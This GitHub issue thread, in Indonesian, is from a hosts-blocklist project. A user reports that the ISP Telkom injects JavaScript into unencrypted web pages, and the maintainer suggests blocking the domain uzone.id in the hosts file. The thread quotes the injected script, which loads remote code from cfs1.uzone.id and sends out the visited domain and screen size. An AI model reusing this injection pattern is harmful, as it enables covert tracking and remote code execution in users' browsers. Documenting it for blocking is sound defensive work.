### ISSUE TITLE
Block Botnet miliki Telkom pada jaringan non-HTTPS

### ISSUE THREAD

**Issue by indrakaw** [gvoze32/blockhostid#40]
Cek ini: https://www.bersosial.com/threads/isp-telkom-menyisipkan-javascript-pada-jaringan-non-https.36665/

Thread itu terakhir Agustus 2016, dan sepertinya masih valid. 

Ini snip JS (beautify) ketika saya mengakses domain http://example.com (non-HTTPS):

```html
<script type="text/javascript">
if (self == top) {
    function netbro_cache_analytics(fn, callback) {
        setTimeout(function() {
            fn();
            callback();
        }, 0);
    }

    function sync(fn) {
        fn();
    }

    function requestCfs() {
        var idc_glo_url = (location.protocol == "https:" ? "https://" : "http://");
        var idc_glo_r = Math.floor(Math.random() * 99999999999);
        var url = idc_glo_url + "cfs1.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + FuckThisBotNetShit + "&idc_r=" + idc_glo_r + "&domain=" + document.domain + "&sw=" + screen.width + "&sh=" + screen.height;
        var bsa = document.createElement('script');
        bsa.type = 'text/javascript';
        bsa.async = true;
        bsa.src = url;
        (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(bsa);
    }
    netbro_cache_analytics(requestCfs, function() {});
};
</script>
</html>
```

Sebelumnya saya pakai NoScript untuk memblokir segala sumber dari `uzone.id`, namun untuk versi NoScript pada versi Firefox terbaru tidak memindai ini.

Mohon agar botnet itu segera diblokir.

**Comment by gvoze32** [comment]
Menurut saya, pemblokiran ini bisa dilakukan dengan menambahkan link uzone.id di hosts. Tapi saya belum coba juga, jadi belum tahu apakah work atau tidak.

Coba agan coba tambahin ini di line hosts.
127.0.0.1 uzone.id www.uzone.id

Semoga work, jika tidak, saya juga kurang ngerti soal beginian...
